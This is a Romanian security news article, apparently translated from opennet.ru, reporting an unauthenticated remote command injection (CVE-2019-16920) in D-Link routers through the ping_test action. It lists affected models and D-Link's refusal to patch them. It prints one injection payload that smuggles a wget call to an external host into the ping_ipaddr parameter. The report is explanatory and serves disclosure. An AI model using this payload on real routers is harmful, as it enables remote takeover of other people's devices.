Vulnerabilitatea exploatabilă de la distanță în routerele D-Link

În routerele wireless D-Link identificat vulnerabilitate periculoasă (CVE-2019-16920), care vă permite să executați cod de la distanță pe partea dispozitivului, trimițând o solicitare specială către handler-ul „ping_test”, accesibil fără autentificare.

Interesant este că, potrivit dezvoltatorilor de firmware, apelul „ping_test” ar trebui să fie executat numai după autentificare, dar în realitate este apelat în orice caz, indiferent de autentificarea la interfața web. În special, la accesarea scriptului apply_sec.cgi și la trecerea parametrului „action=ping_test”, scriptul redirecționează către pagina de autentificare, dar în același timp realizează acțiunea asociată cu ping_test. Pentru a executa codul, a fost folosită o altă vulnerabilitate în ping_test în sine, care apelează utilitarul ping fără a verifica corect corectitudinea adresei IP trimise pentru testare. De exemplu, pentru a apela utilitarul wget și a transfera rezultatele comenzii „echo 1234” la o gazdă externă, trebuie doar să specificați parametrul „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Vulnerabilitatea exploatabilă de la distanță în routerele D-Link

Prezența vulnerabilității a fost confirmată oficial în următoarele modele:

  • DIR-655 cu firmware 3.02b05 sau mai vechi;
  • DIR-866L cu firmware 1.03b04 sau mai vechi;
  • DIR-1565 cu firmware 1.01 sau mai vechi;
  • DIR-652 (nu sunt furnizate informații despre versiunile de firmware problematice)

Perioada de suport pentru aceste modele a expirat deja, așa că D-Link El a afirmat, care nu le va lansa actualizări pentru a elimina vulnerabilitatea, nu recomandă utilizarea lor și recomandă înlocuirea lor cu dispozitive noi. Ca o soluție de securitate, puteți limita accesul la interfața web doar la adrese IP de încredere.

Ulterior s-a descoperit că și vulnerabilitatea a fost afectează modelele DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 și DIR-825, planuri de lansare a actualizărilor pentru care nu se cunosc încă.

Sursa: opennet.ru

Adauga un comentariu